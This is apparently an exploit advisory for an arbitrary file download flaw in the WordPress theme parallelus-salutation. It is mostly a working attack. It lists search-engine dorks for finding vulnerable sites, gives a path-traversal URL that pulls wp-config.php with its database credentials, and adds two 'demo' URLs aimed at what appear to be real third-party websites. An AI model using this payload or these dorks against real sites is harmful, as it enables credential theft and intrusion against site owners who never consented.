############################################################## # Exploit Title: WordPress theme parallelus-salutation Arbitrary File Download Vulnerability . # # Exploit Author: Iran Cyber Security Group # # Discovered By: injector # # Dork 1: inurl:themes/parallelus-salutation/ # # Dork 2: inurl:themes/parallelus-salutation/framework/ # # Date: 18-12-2014 # # Tested on: Kali, Win7 # # Category: webapps # # platform: php ############################################################## VULNERABILITY ############## [~] VULNERABILITY}~~ [~] http://www.Site.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php ############## demo 1: www.scarabreseaXrch.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php demo 2: http://www.patcXhingprotocol.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php ##############################################################